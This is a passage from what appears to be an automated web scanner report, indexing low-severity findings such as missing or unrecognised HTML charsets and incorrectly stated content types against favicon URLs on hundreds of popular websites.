24.421. http://www.ilike.com/favicon.ico

24.422. http://www.iloveindia.com/favicon.ico

24.423. http://www.imageshack.us/favicon.ico

24.424. http://www.imdb.com/favicon.ico

24.425. http://www.imesh.com/favicon.ico

24.426. http://www.in.gov/favicon.ico

24.427. http://www.inbox.com/favicon.ico

24.428. http://www.inc.com/favicon.ico

24.429. http://www.indeed.com/favicon.ico

24.430. http://www.indiatimes.com/favicon.ico

24.431. http://www.info.com/favicon.ico

24.432. http://www.infoplease.com/favicon.ico

24.433. http://www.infowars.com/favicon.ico

24.434. http://www.ingdirect.com/favicon.ico

24.435. http://www.insiderpages.com/favicon.ico

24.436. http://www.instructables.com/favicon.ico

24.437. http://www.intel.com/favicon.ico

24.438. http://www.intellicast.com/favicon.ico

24.439. http://www.intuit.com/favicon.ico

24.440. http://www.iobit.com/favicon.ico

24.441. http://www.ioffer.com/favicon.ico

24.442. http://www.irs.gov/favicon.ico

24.443. http://www.issuu.com/favicon.ico

24.444. http://www.istockphoto.com/favicon.ico

24.445. http://www.iwin.com/favicon.ico

24.446. http://www.jcpenney.com/favicon.ico

24.447. http://www.jcwhitney.com/favicon.ico

24.448. http://www.jihadwatch.org/favicon.ico

24.449. http://www.joann.com/favicon.ico

24.450. http://www.job.com/favicon.ico

24.451. http://www.jobsonline.net/favicon.ico

24.452. http://www.jstor.org/favicon.ico

24.453. http://www.jtv.com/favicon.ico

24.454. http://www.justanswer.com/favicon.ico

24.455. http://www.justin.tv/favicon.ico

24.456. http://www.justluxe.com/favicon.ico

24.457. http://www.kaboodle.com/favicon.ico

24.458. http://www.kaboose.com/favicon.ico

24.459. http://www.kaspersky.com/favicon.ico

24.460. http://www.kayak.com/favicon.ico

24.461. http://www.kazaa.com/favicon.ico

24.462. http://www.kbb.com/favicon.ico

24.463. http://www.kcom.com/

24.464. http://www.kenexa.com/favicon.ico

24.465. http://www.killerstartups.com/favicon.ico

24.466. http://www.king.com/favicon.ico

24.467. http://www.kmart.com/favicon.ico

24.468. http://www.kodak.com/favicon.ico

24.469. http://www.kodakgallery.com/favicon.ico

24.470. http://www.kraftrecipes.com/favicon.ico

24.471. http://www.krillion.com/favicon.ico

24.472. http://www.lanebryant.com/favicon.ico

24.473. http://www.last.fm/favicon.ico

24.474. http://www.latimes.com/favicon.ico

24.475. http://www.legacy.com/favicon.ico

24.476. http://www.letssingit.com/favicon.ico

24.477. http://www.levi.com/favicon.ico

24.478. http://www.lg.com/favicon.ico

24.479. http://www.life123.com/favicon.ico

24.480. http://www.lifescript.com/favicon.ico

24.481. http://www.lijit.com/favicon.ico

24.482. http://www.like.com/favicon.ico

24.483. http://www.lingospot.com/favicon.ico

24.484. http://www.linkedin.com/favicon.ico

24.485. http://www.liutilities.com/favicon.ico

24.486. http://www.livecams.com/favicon.ico

24.487. http://www.livejournal.com/favicon.ico

24.488. http://www.livenation.com/favicon.ico

24.489. http://www.llbean.com/favicon.ico

24.490. http://www.loc.gov/favicon.ico

24.491. http://www.local.com/favicon.ico

24.492. http://www.localguides.com/favicon.ico

24.493. http://www.localpages.com/favicon.ico

24.494. http://www.lowermybills.com/favicon.ico

24.495. http://www.lowes.com/favicon.ico

24.496. http://www.lowfares.com/favicon.ico

24.497. http://www.lyrics007.com/favicon.ico

24.498. http://www.lyricsmode.com/favicon.ico

24.499. http://www.macraesbluebook.com/favicon.ico

24.500. http://www.macrumors.com/favicon.ico

24.501. http://www.macys.com/favicon.ico

24.502. http://www.made-in-china.com/favicon.ico

24.503. http://www.mail.com/favicon.ico

24.504. http://www.mainstreet.com/favicon.ico

24.505. http://www.manualsonline.com/favicon.ico

24.506. http://www.mapquest.com/favicon.ico

24.507. http://www.mapsofworld.com/favicon.ico

24.508. http://www.marriott.com/favicon.ico

24.509. http://www.marthastewart.com/favicon.ico

24.510. http://www.marykay.com/favicon.ico

24.511. http://www.mastercard.com/favicon.ico

24.512. http://www.match.com/favicon.ico

24.513. http://www.mate1.net/favicon.ico

24.514. http://www.maxim.com/favicon.ico

24.515. http://www.mayoclinic.com/favicon.ico

24.516. http://www.mcafee.com/favicon.ico

24.517. http://www.medcohealth.com/favicon.ico

24.518. http://www.mediaite.com/favicon.ico

24.519. http://www.medicalnewstoday.com/favicon.ico

24.520. http://www.medicare.gov/favicon.ico

24.521. http://www.medscape.com/favicon.ico

24.522. http://www.meebo.com/favicon.ico

24.523. http://www.meetlocals.com/favicon.ico

24.524. http://www.meetup.com/favicon.ico

24.525. http://www.megaupload.com/favicon.ico

24.526. http://www.menshealth.com/favicon.ico

24.527. http://www.menuism.com/favicon.ico

24.528. http://www.menupages.com/favicon.ico

24.529. http://www.merchantcircle.com/favicon.ico

24.530. http://www.merck.com/favicon.ico

24.531. http://www.mercola.com/favicon.ico

24.532. http://www.metacafe.com/favicon.ico

24.533. http://www.metafilter.com/favicon.ico

24.534. http://www.metrolyrics.com/favicon.ico

24.535. http://www.metromix.com/favicon.ico

24.536. http://www.metropcs.com/favicon.ico

24.537. http://www.mgid.com/favicon.ico

24.538. http://www.miamiherald.com/favicon.ico

24.539. http://www.michaels.com/favicon.ico

24.540. http://www.michigan.gov/favicon.ico

24.541. http://www.microsofttranslator.com/favicon.ico

24.542. http://www.military.com/favicon.ico

24.543. http://www.mindjolt.com/favicon.ico

24.544. http://www.miracleworkers.com/favicon.ico

24.545. http://www.mlb.com/favicon.ico

24.546. http://www.mlive.com/favicon.ico

24.547. http://www.mocospace.com/favicon.ico

24.548. http://www.modelmayhem.com/favicon.ico

24.549. http://www.momswhothink.com/favicon.ico

24.550. http://www.moviesunlimited.com/favicon.ico

24.551. http://www.movietickets.com/favicon.ico

24.552. http://www.mozilla.com/favicon.ico

24.553. http://www.mp3lyrics.org/favicon.ico

24.554. http://www.mp3raid.com/favicon.ico

24.555. http://www.mrmovietimes.com/favicon.ico

24.556. http://www.msnbc.com/favicon.ico

24.557. http://www.mtv.com/favicon.ico

24.558. http://www.multimap.com/favicon.ico

24.559. http://www.musiciansfriend.com/favicon.ico

24.560. http://www.mybloglog.com/favicon.ico

24.561. http://www.mycokerewards.com/favicon.ico

24.562. http://www.mycricket.com/favicon.ico

24.563. http://www.myheritage.com/favicon.ico

24.564. http://www.mylife.com/favicon.ico

24.565. http://www.mylifetime.com/favicon.ico

24.566. http://www.mynewplace.com/favicon.ico

24.567. http://www.mysanantonio.com/favicon.ico

24.568. http://www.myspace.com/favicon.ico

24.569. http://www.mystart.com/favicon.ico

24.570. http://www.myxer.com/favicon.ico

24.571. http://www.myyearbook.com/favicon.ico

24.572. http://www.nadaguides.com/favicon.ico

24.573. http://www.nasa.gov/favicon.ico

24.574. http://www.nationalgeographic.com/favicon.ico

24.575. http://www.navy.mil/favicon.ico

24.576. http://www.nba.com/favicon.ico

24.577. http://www.nbc.com/favicon.ico

24.578. http://www.nbcnewyork.com/favicon.ico

24.579. http://www.ncm.com/favicon.ico

24.580. http://www.netflix.com/favicon.ico

24.581. http://www.netquote.com/favicon.ico

24.582. http://www.netsuite.com/favicon.ico

24.583. http://www.newegg.com/favicon.ico

24.584. http://www.newgrounds.com/favicon.ico

24.585. http://www.newport-news.com/favicon.ico

24.586. http://www.newsbucket.co.uk/favicon.ico

24.587. http://www.newser.com/favicon.ico

24.588. http://www.newsinc.com/favicon.ico

24.589. http://www.newsmax.com/favicon.ico

24.590. http://www.newsok.com/favicon.ico

24.591. http://www.newsvine.com/favicon.ico

24.592. http://www.newsweek.com/favicon.ico

24.593. http://www.nextel.com/favicon.ico

24.594. http://www.nextinsure.com/favicon.ico

24.595. http://www.nfl.com/favicon.ico

24.596. http://www.nhl.com/favicon.ico

24.597. http://www.nickjr.com/favicon.ico

24.598. http://www.nih.gov/favicon.ico

24.599. http://www.nike.com/favicon.ico

24.600. http://www.nintendo.com/favicon.ico

24.601. http://www.nola.com/favicon.ico

24.602. http://www.northerntool.com/favicon.ico

24.603. http://www.notebookreview.com/favicon.ico

24.604. http://www.npr.org/favicon.ico

24.605. http://www.nps.gov/favicon.ico

24.606. http://www.nwsource.com/favicon.ico

24.607. http://www.nydailynews.com/favicon.ico

24.608. http://www.nypost.com/favicon.ico

24.609. http://www.nytimes.com/favicon.ico

24.610. http://www.ocregister.com/favicon.ico

24.611. http://www.octonet.com/favicon.ico

24.612. http://www.officedepot.com/favicon.ico

24.613. http://www.officemax.com/favicon.ico

24.614. http://www.olivegarden.com/favicon.ico

24.615. http://www.onemanga.com/favicon.ico

24.616. http://www.onlywire.com/favicon.ico

24.617. http://www.oodle.com/favicon.ico

24.618. http://www.opentable.com/favicon.ico

24.619. http://www.opera.com/favicon.ico

24.620. http://www.opinionlab.com/favicon.ico

24.621. http://www.opm.gov/favicon.ico

24.622. http://www.opportunity.co/favicon.ico

24.623. http://www.oprah.com/favicon.ico

24.624. http://www.oracle.com/favicon.ico

24.625. http://www.orbitz.com/favicon.ico

24.626. http://www.orchardbank.com/favicon.ico

24.627. http://www.oregonlive.com/favicon.ico

24.628. http://www.orientaltrading.com/favicon.ico

24.629. http://www.ourstage.com/favicon.ico

24.630. http://www.overstock.com/favicon.ico

24.631. http://www.ovguide.com/favicon.ico

24.632. http://www.parenting.com/favicon.ico

24.633. http://www.parentsconnect.com/favicon.ico

24.634. http://www.partstore.com/favicon.ico

24.635. http://www.partypoker.com/favicon.ico

24.636. http://www.payless.com/favicon.ico

24.637. http://www.paypal.com/favicon.ico

24.638. http://www.pbs.org/favicon.ico

24.639. http://www.pchlotto.com/favicon.ico

24.640. http://www.pcmag.com/favicon.ico

24.641. http://www.pctools.com/favicon.ico

24.642. http://www.pcworld.com/favicon.ico

24.643. http://www.people.com/favicon.ico

24.644. http://www.peoplefinders.com/favicon.ico

24.645. http://www.peopleofwalmart.com/favicon.ico

24.646. http://www.peoplestylewatch.com/favicon.ico

24.647. http://www.petco.com/favicon.ico

24.648. http://www.petfinder.com/favicon.ico

24.649. http://www.petside.com/favicon.ico

24.650. http://www.petsmart.com/favicon.ico

24.651. http://www.pga.com/favicon.ico

24.652. http://www.pgatour.com/favicon.ico

24.653. http://www.philly.com/favicon.ico

24.654. http://www.phoenix.edu/favicon.ico

24.655. http://www.pickyourown.org/favicon.ico

24.656. http://www.picnik.com/favicon.ico

24.657. http://www.picsearch.com/favicon.ico

24.658. http://www.pillsbury.com/favicon.ico

24.659. http://www.pipl.com/favicon.ico

24.660. http://www.pittsburghlive.com/favicon.ico

24.661. http://www.playdom.com/favicon.ico

24.662. http://www.playfin.com/favicon.ico

24.663. http://www.pnc.com/favicon.ico

24.664. http://www.pogo.com/favicon.ico

24.665. http://www.pokerstars.com/favicon.ico

24.666. http://www.politico.com/favicon.ico

24.667. http://www.politicsdaily.com/favicon.ico

24.668. http://www.pollmonkey.com/favicon.ico

24.669. http://www.polyvore.com/favicon.ico

24.670. http://www.popcap.com/favicon.ico

24.671. http://www.poptropica.com/favicon.ico

24.672. http://www.popularscreensavers.com/favicon.ico

24.673. http://www.potterybarn.com/favicon.ico

24.674. http://www.pricegong.com/favicon.ico

24.675. http://www.primarygames.com/favicon.ico

24.676. http://www.prlog.org/favicon.ico

24.677. http://www.progressive.com/favicon.ico

24.678. http://www.pronto.com/favicon.ico

24.679. http://www.psu.edu/favicon.ico

24.680. http://www.publicrecords.com/favicon.ico

24.681. http://www.purdue.edu/favicon.ico

24.682. http://www.purplemath.com/favicon.ico

24.683. http://www.qualityhealth.com/favicon.ico

24.684. http://www.qualtrics.com/favicon.ico

24.685. http://www.questia.com/favicon.ico

24.686. http://www.quotegarden.com/favicon.ico

24.687. http://www.qwest.com/favicon.ico

24.688. http://www.radioshack.com/favicon.ico

24.689. http://www.rawtube.com/favicon.ico

24.690. http://www.reachlocal.com/favicon.ico

24.691. http://www.realage.com/favicon.ico

24.692. http://www.realsimple.com/favicon.ico

24.693. http://www.realtor.com/favicon.ico

24.694. http://www.redbox.com/favicon.ico

24.695. http://www.reddit.com/favicon.ico

24.696. http://www.redorbit.com/favicon.ico

24.697. http://www.reference.com/favicon.ico

24.698. http://www.regions.com/favicon.ico

24.699. http://www.registrydefender.com/favicon.ico

24.700. http://www.rei.com/favicon.ico

24.701. http://www.rent.com/favicon.ico

24.702. http://www.rentals.com/favicon.ico

24.703. http://www.reply.com/favicon.ico

24.704. http://www.retailmenot.com/favicon.ico

24.705. http://www.retrevo.com/favicon.ico

24.706. http://www.reuters.com/favicon.ico

24.707. http://www.ripoffreport.com/favicon.ico

24.708. http://www.riteaid.com/favicon.ico

24.709. http://www.rivals.com/favicon.ico

24.710. http://www.rollingstone.com/favicon.ico

24.711. http://www.rotoworld.com/favicon.ico

24.712. http://www.rottentomatoes.com/favicon.ico

24.713. http://www.roxwel.com/favicon.ico

24.714. http://www.rr.com/favicon.ico

24.715. http://www.rss2search.com/favicon.ico

24.716. http://www.runescape.com/favicon.ico

24.717. http://www.sacbee.com/favicon.ico

24.718. http://www.safeway.com/favicon.ico

24.719. http://www.salesforce.com/favicon.ico

24.720. http://www.salon.com/favicon.ico

24.721. http://www.samsclub.com/favicon.ico

24.722. http://www.savings.com/favicon.ico

24.723. http://www.sbnation.com/favicon.ico

24.724. http://www.scholastic.com/favicon.ico

24.725. http://www.sciencedaily.com/favicon.ico

24.726. http://www.scottrade.com/favicon.ico

24.727. http://www.scout.com/favicon.ico

24.728. http://www.scribd.com/favicon.ico

24.729. http://www.sears.com/favicon.ico

24.730. http://www.seattlepi.com/favicon.ico

24.731. http://www.sendspace.com/favicon.ico

24.732. http://www.seniorpeoplemeet.com/favicon.ico

24.733. http://www.sephora.com/favicon.ico

24.734. http://www.sfgate.com/favicon.ico

24.735. http://www.shangri-la.com/favicon.ico

24.736. http://www.sharebuilder.com/favicon.ico

24.737. http://www.shockwave.com/favicon.ico

24.738. http://www.shoebuy.com/favicon.ico

24.739. http://www.shop.com/favicon.ico

24.740. http://www.shopathome.com/favicon.ico

24.741. http://www.shopcompanion.com/favicon.ico

24.742. http://www.shopping.com/favicon.ico

24.743. http://www.shopstyle.com/favicon.ico

24.744. http://www.shopzilla.com/favicon.ico

24.745. http://www.shutterfly.com/favicon.ico

24.746. http://www.simon.com/favicon.ico

24.747. http://www.simplyhired.com/favicon.ico

24.748. http://www.sing365.com/favicon.ico

24.749. http://www.singlesnet.com/favicon.ico

24.750. http://www.sky.com/favicon.ico

24.751. http://www.skype.com/favicon.ico

24.752. http://www.slate.com/favicon.ico

24.753. http://www.slide.com/favicon.ico

24.754. http://www.slideshare.net/favicon.ico

24.755. http://www.smarter.com/favicon.ico

24.756. http://www.smilebox.com/favicon.ico

24.757. http://www.smugmug.com/favicon.ico

24.758. http://www.snagajob.com/favicon.ico

24.759. http://www.snapfish.com/favicon.ico

24.760. http://www.socialsecurity.gov/favicon.ico

24.761. http://www.sodahead.com/favicon.ico

24.762. http://www.soft32.com/favicon.ico

24.763. http://www.soft82.com/favicon.ico

24.764. http://www.softonic.com/favicon.ico

24.765. http://www.softpedia.com/favicon.ico

24.766. http://www.songlyrics.com/favicon.ico

24.767. http://www.sony.com/favicon.ico

24.768. http://www.southwest.com/favicon.ico

24.769. http://www.spanishdict.com/favicon.ico

24.770. http://www.sparkpeople.com/favicon.ico

24.771. http://www.spellingcity.com/favicon.ico

24.772. http://www.spike.com/favicon.ico

24.773. http://www.spokeo.com/favicon.ico

24.774. http://www.sportsauthority.com/favicon.ico

24.775. http://www.sportsmansguide.com/favicon.ico

24.776. http://www.sportsnetwork.com/favicon.ico

24.777. http://www.springerlink.com/favicon.ico

24.778. http://www.sprint.com/favicon.ico

24.779. http://www.squidoo.com/favicon.ico

24.780. http://www.ssa.gov/favicon.ico

24.781. http://www.stanford.edu/favicon.ico

24.782. http://www.star-telegram.com/favicon.ico

24.783. http://www.starpulse.com/favicon.ico

24.784. http://www.startribune.com/favicon.ico

24.785. http://www.state.gov/favicon.ico

24.786. http://www.state.tn.us/favicon.ico

24.787. http://www.statefarm.com/favicon.ico

24.788. http://www.stateuniversity.com/favicon.ico

24.789. http://www.steadyhealth.com/favicon.ico

24.790. http://www.stltoday.com/favicon.ico

24.791. http://www.stlyrics.com/favicon.ico

24.792. http://www.stumbleupon.com/favicon.ico

24.793. http://www.stylelist.com/favicon.ico

24.794. http://www.suite101.com/favicon.ico

24.795. http://www.suntimes.com/favicon.ico

24.796. http://www.superiorpics.com/favicon.ico

24.797. http://www.superpages.com/favicon.ico

24.798. http://www.symantec.com/favicon.ico

24.799. http://www.t-mobile.com/favicon.ico

24.800. http://www.tagged.com/favicon.ico

24.801. http://www.talkingpointsmemo.com/favicon.ico

24.802. http://www.tampabay.com/favicon.ico

24.803. http://www.target.com/favicon.ico

24.804. http://www.tastebook.com/favicon.ico

24.805. http://www.techbargains.com/favicon.ico

24.806. http://www.telegraph.co.uk/favicon.ico

24.807. http://www.terra.com/favicon.ico

24.808. http://www.textsfromlastnight.com/favicon.ico

24.809. http://www.theatlantic.com/favicon.ico

24.810. http://www.thedailybeast.com/favicon.ico

24.811. http://www.thedailyshow.com/favicon.ico

24.812. http://www.thedietsolutionprogram.com/favicon.ico

24.813. http://www.theepochtimes.com/favicon.ico

24.814. http://www.thefind.com/favicon.ico

24.815. http://www.thefreedictionary.com/favicon.ico

24.816. http://www.thefreelibrary.com/favicon.ico

24.817. http://www.thefrisky.com/favicon.ico

24.818. http://www.theglobeandmail.com/favicon.ico

24.819. http://www.theonion.com/favicon.ico

24.820. http://www.thesaurus.com/favicon.ico

24.821. http://www.thirdage.com/favicon.ico

24.822. http://www.thisis50.com/favicon.ico

24.823. http://www.thisoldhouse.com/favicon.ico

24.824. http://www.thomasnet.com/favicon.ico

24.825. http://www.thriftyfun.com/favicon.ico

24.826. http://www.ticketmaster.com/favicon.ico

24.827. http://www.tickets.com/favicon.ico

24.828. http://www.ticketsnow.com/favicon.ico

24.829. http://www.tigerdirect.com/favicon.ico

24.830. http://www.time.com/favicon.ico

24.831. http://www.timeanddate.com/favicon.ico

24.832. http://www.timewarnercable.com/favicon.ico

24.833. http://www.tinypic.com/favicon.ico

24.834. http://www.tmz.com/favicon.ico

24.835. http://www.tomshardware.com/favicon.ico

24.836. http://www.topix.com/favicon.ico

24.837. http://www.topix.net/favicon.ico

24.838. http://www.topshareware.com/favicon.ico

24.839. http://www.toptenreviews.com/favicon.ico

24.840. http://www.totalbeauty.com/favicon.ico

24.841. http://www.townhall.com/favicon.ico

24.842. http://www.toyota.com/favicon.ico

24.843. http://www.toysrus.com/favicon.ico

24.844. http://www.trafficrevenue.net/favicon.ico

24.845. http://www.trails.com/favicon.ico

24.846. http://www.travel-ticker.com/favicon.ico

24.847. http://www.travelocity.com/favicon.ico

24.848. http://www.travelpod.com/favicon.ico

24.849. http://www.travelzoo.com/favicon.ico

24.850. http://www.trendmicro.com/favicon.ico

24.851. http://www.tripadvisor.com/favicon.ico

24.852. http://www.tripzen.com/favicon.ico

24.853. http://www.true.com/favicon.ico

24.854. http://www.trulia.com/favicon.ico

24.855. http://www.truste.com/favicon.ico

24.856. http://www.tv.com/favicon.ico

24.857. http://www.tvguide.com/favicon.ico

24.858. http://www.tvtxtr.com/favicon.ico

24.859. http://www.ucomparehealthcare.com/favicon.ico

24.860. http://www.ufc.com/favicon.ico

24.861. http://www.uhaul.com/favicon.ico

24.862. http://www.ultimate-guitar.com/favicon.ico

24.863. http://www.umich.edu/favicon.ico

24.864. http://www.univision.com/favicon.ico

24.865. http://www.ups.com/favicon.ico

24.866. http://www.uptake.com/favicon.ico

24.867. http://www.urbanspoon.com/favicon.ico

24.868. http://www.usa-people-search.com/favicon.ico

24.869. http://www.usajobs.gov/favicon.ico

24.870. http://www.usatoday.com/favicon.ico

24.871. http://www.usbank.com/favicon.ico

24.872. http://www.use.com/favicon.ico

24.873. http://www.usgs.gov/favicon.ico

24.874. http://www.usmagazine.com/favicon.ico

24.875. http://www.usps.com/favicon.ico

24.876. http://www.ussearch.com/favicon.ico

24.877. http://www.ustream.tv/favicon.ico

24.878. http://www.utorrent.com/favicon.ico

24.879. http://www.va.gov/favicon.ico

24.880. http://www.vanguard.com/favicon.ico

24.881. http://www.vast.com/favicon.ico

24.882. http://www.veoh.com/favicon.ico

24.883. http://www.verisign.com/favicon.ico

24.884. http://www.vh1.com/favicon.ico

24.885. http://www.victoriassecret.com/favicon.ico

24.886. http://www.videobash.com/favicon.ico

24.887. http://www.videojug.com/favicon.ico

24.888. http://www.videosurf.com/favicon.ico

24.889. http://www.viewpoints.com/favicon.ico

24.890. http://www.villagevoice.com/favicon.ico

24.891. http://www.vimeo.com/favicon.ico

24.892. http://www.virginia.gov/favicon.ico

24.893. http://www.virginmobileusa.com/favicon.ico

24.894. http://www.vistaprint.com/favicon.ico

24.895. http://www.vitals.com/favicon.ico

24.896. http://www.vrbo.com/favicon.ico

24.897. http://www.walgreens.com/favicon.ico

24.898. http://www.walletpop.com/favicon.ico

24.899. http://www.walmart.com/favicon.ico

24.900. http://www.wapedia.mobi/favicon.ico

24.901. http://www.warnerbros.com/favicon.ico

24.902. http://www.washingtonpost.com/favicon.ico

24.903. http://www.weather.com/favicon.ico

24.904. http://www.weather.gov/favicon.ico

24.905. http://www.weatherbug.com/favicon.ico

24.906. http://www.webcrawler.com/favicon.ico

24.907. http://www.webgains.com/favicon.ico

24.908. http://www.webmd.com/favicon.ico

24.909. http://www.webring.org/favicon.ico

24.910. http://www.webs.com/favicon.ico

24.911. http://www.webshots.com/favicon.ico

24.912. http://www.weightwatchers.com/favicon.ico

24.913. http://www.wellness.com/favicon.ico

24.914. http://www.wellsfargo.com/favicon.ico

24.915. http://www.wendys.com/favicon.ico

24.916. http://www.wetpaint.com/favicon.ico

24.917. http://www.where2getit.com/favicon.ico

24.918. http://www.whitepages.com/favicon.ico

24.919. http://www.wikia.com/favicon.ico

24.920. http://www.wikimapia.org/favicon.ico

24.921. http://www.wikimedia.org/favicon.ico

24.922. http://www.wikio.com/favicon.ico

24.923. http://www.wimp.com/favicon.ico

24.924. http://www.winbuyer.com/favicon.ico

24.925. http://www.wired.com/favicon.ico

24.926. http://www.wisegeek.com/favicon.ico

24.927. http://www.wix.com/favicon.ico

24.928. http://www.womansday.com/favicon.ico

24.929. http://www.wonderhowto.com/favicon.ico

24.930. http://www.worldwinner.com/favicon.ico

24.931. http://www.worthpoint.com/favicon.ico

24.932. http://www.wowhead.com/favicon.ico

24.933. http://www.wowwiki.com/favicon.ico

24.934. http://www.wsbtv.com/favicon.ico

24.935. http://www.wunderground.com/favicon.ico

24.936. http://www.wwe.com/favicon.ico

24.937. http://www.xanga.com/favicon.ico

24.938. http://www.xe.com/favicon.ico

24.939. http://www.yakaz.com/favicon.ico

24.940. http://www.yallwire.com/favicon.ico

24.941. http://www.yardbarker.com/favicon.ico

24.942. http://www.yellow.com/favicon.ico

24.943. http://www.yellowbook.com/favicon.ico

24.944. http://www.yellowpages.com/favicon.ico

24.945. http://www.yelp.com/favicon.ico

24.946. http://www.yidio.com/favicon.ico

24.947. http://www.younghollywood.com/favicon.ico

24.948. http://www.yourdictionary.com/favicon.ico

24.949. http://www.yourfilehost.com/favicon.ico

24.950. http://www.yuku.com/favicon.ico

24.951. http://www.zabasearch.com/favicon.ico

24.952. http://www.zap2it.com/favicon.ico

24.953. http://www.zappos.com/favicon.ico

24.954. http://www.zazzle.com/favicon.ico

24.955. http://www.zillow.com/favicon.ico

24.956. http://www.zimbio.com/favicon.ico

24.957. http://www.ziprealty.com/favicon.ico

24.958. http://www.zmags.com/favicon.ico

24.959. http://www.zoosk.com/favicon.ico

24.960. http://www.zshare.net/favicon.ico

24.961. http://www.zvents.com/favicon.ico

24.962. http://www.zynga.com/favicon.ico

25. HTML does not specify charset

25.1. https://activresa-secure2.icor.fr/

25.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

25.3. http://fls.doubleclick.net/activityi

25.4. http://www.avast.com/favicon.ico

25.5. http://www.billsnitzer.com/favicon.ico

25.6. http://www.cheetahmail.com/favicon.ico

25.7. http://www.chinaontv.com/favicon.ico

25.8. http://www.citibank.com/favicon.ico

25.9. http://www.cobaltnitra.com/favicon.ico

25.10. http://www.coolmath.com/favicon.ico

25.11. http://www.coolmath4kids.com/favicon.ico

25.12. http://www.crocoads.com/favicon.ico

25.13. http://www.drudgereport.com/favicon.ico

25.14. http://www.dt00.net/favicon.ico

25.15. http://www.ehow.co.uk/favicon.ico

25.16. http://www.elyricsworld.com/favicon.ico

25.17. http://www.epinions.com/favicon.ico

25.18. http://www.fark.com/favicon.ico

25.19. http://www.firecue.com/favicon.ico

25.20. http://www.freedownloadscenter.com/favicon.ico

25.21. http://www.freeze.com/favicon.ico

25.22. http://www.hbo.com/favicon.ico

25.23. http://www.iloveindia.com/favicon.ico

25.24. http://www.intuit.com/favicon.ico

25.25. http://www.iwin.com/favicon.ico

25.26. http://www.lingospot.com/favicon.ico

25.27. http://www.moviesunlimited.com/favicon.ico

25.28. http://www.music-oasis.com/favicon.ico

25.29. http://www.olpinhoopes.com/favicon.ico

25.30. http://www.rmloader.com/favicon.ico

25.31. http://www.samsung.com/favicon.ico

25.32. http://www.socialsurveys.us/favicon.ico

25.33. http://www.sparkstudios.com/favicon.ico

25.34. http://www.springerlink.com/favicon.ico

25.35. http://www.swagbucks.com/favicon.ico

25.36. http://www.thegrids.info/favicon.ico

25.37. http://www.tidaltv.com/favicon.ico

25.38. http://www.trafficrevenue.net/favicon.ico

25.39. http://www.verisign.com/favicon.ico

25.40. http://www.verizon.net/favicon.ico

25.41. http://www.woot.com/favicon.ico

25.42. http://www.xe.com/favicon.ico

25.43. http://www.y8.com/favicon.ico

25.44. http://www.yfrog.com/favicon.ico

26. HTML uses unrecognised charset

27. Content type incorrectly stated

27.1. http://www.123greetings.com/favicon.ico

27.2. http://www.2wire.net/favicon.ico

27.3. http://www.43things.com/favicon.ico

27.4. http://www.6waves.com/favicon.ico

27.5. http://www.aa.com/favicon.ico

27.6. http://www.aarp.org/favicon.ico

27.7. http://www.ad4game.com/favicon.ico

27.8. http://www.alibaba.com/favicon.ico

27.9. http://www.alibris.com/favicon.ico

27.10. http://www.allbusiness.com/favicon.ico

27.11. http://www.allvoices.com/favicon.ico

27.12. http://www.alphadictionary.com/favicon.ico

27.13. http://www.americantowns.com/favicon.ico

27.14. http://www.andiesisle.com/favicon.ico

27.15. http://www.andkon.com/favicon.ico

27.16. http://www.apartmenthomeliving.com/favicon.ico

27.17. http://www.apartmentratings.com/favicon.ico

27.18. http://www.arizona.edu/favicon.ico

27.19. http://www.aroundme.com/favicon.ico

27.20. http://www.articlesbase.com/favicon.ico

27.21. http://www.ask.com/favicon.ico

27.22. http://www.astrology.com/favicon.ico

27.23. http://www.autozone.com/favicon.ico

27.24. http://www.avast.com/favicon.ico

27.25. http://www.babelgum.com/favicon.ico

27.26. http://www.bankofamerica.com/favicon.ico

27.27. http://www.beezid.com/favicon.ico

27.28. http://www.blucigs.com/favicon.ico

27.29. http://www.blurtit.com/favicon.ico

27.30. http://www.boingboing.net/favicon.ico

27.31. http://www.bravotv.com/favicon.ico

27.32. http://www.breitbart.com/favicon.ico

27.33. http://www.buzzillions.com/favicon.ico

27.34. http://www.cabelas.com/favicon.ico

27.35. http://www.caringbridge.org/favicon.ico

27.36. http://www.cbc.ca/favicon.ico

27.37. http://www.celebrity-gossip.net/favicon.ico

27.38. http://www.census.gov/favicon.ico

27.39. http://www.chilisemailclub.com/favicon.ico

27.40. http://www.chuckecheese.com/favicon.ico

27.41. http://www.cincinnati.com/favicon.ico

27.42. http://www.city-data.com/favicon.ico

27.43. http://www.clocklink.com/favicon.ico

27.44. http://www.clubpenguin.com/favicon.ico

27.45. http://www.cnsnews.com/favicon.ico

27.46. http://www.collegeboard.com/favicon.ico

27.47. http://www.collegeconfidential.com/favicon.ico

27.48. http://www.comedycentral.com/favicon.ico

27.49. http://www.complaintsboard.com/favicon.ico

27.50. http://www.contactmusic.com/favicon.ico

27.51. http://www.craigslist.ca/favicon.ico

27.52. http://www.craigslist.org/favicon.ico

27.53. http://www.craveonline.com/favicon.ico

27.54. http://www.cyberdefender.com/favicon.ico

27.55. http://www.datpiff.com/favicon.ico

27.56. http://www.denverpost.com/favicon.ico

27.57. http://www.detiva.com/favicon.ico

27.58. http://www.diablomedia.com/favicon.ico

27.59. http://www.directbuyvisitorpass.com/favicon.ico

27.60. http://www.doityourself.com/favicon.ico

27.61. http://www.dreamstime.com/favicon.ico

27.62. http://www.driverside.com/favicon.ico

27.63. http://www.eatingwell.com/favicon.ico

27.64. http://www.ebaumsworld.com/favicon.ico

27.65. http://www.economist.com/favicon.ico

27.66. http://www.ed.gov/favicon.ico

27.67. http://www.egotastic.com/favicon.ico

27.68. http://www.ehealthforum.com/favicon.ico

27.69. http://www.ehow.co.uk/favicon.ico

27.70. http://www.epicurious.com/favicon.ico

27.71. http://www.epinions.com/favicon.ico

27.72. http://www.examiner.com/favicon.ico

27.73. http://www.ezanga.com/favicon.ico

27.74. http://www.familybuilder.com/favicon.ico

27.75. http://www.fantage.com/favicon.ico

27.76. http://www.faqs.org/favicon.ico

27.77. http://www.fastcompany.com/favicon.ico

27.78. http://www.fetedoris.com/favicon.ico

27.79. http://www.filestube.com/favicon.ico

27.80. http://www.findagrave.com/favicon.ico

27.81. http://www.finishline.com/favicon.ico

27.82. http://www.flixster.com/favicon.ico

27.83. http://www.food.com/favicon.ico

27.84. http://www.fortunecity.com/favicon.ico

27.85. http://www.freecause.com/favicon.ico

27.86. http://www.freeonlinegames.com/favicon.ico

27.87. http://www.freeze.com/favicon.ico

27.88. http://www.freshdeals.com/favicon.ico

27.89. http://www.funbrain.com/favicon.ico

27.90. http://www.gamehouse.com/favicon.ico

27.91. http://www.gamevance.com/favicon.ico

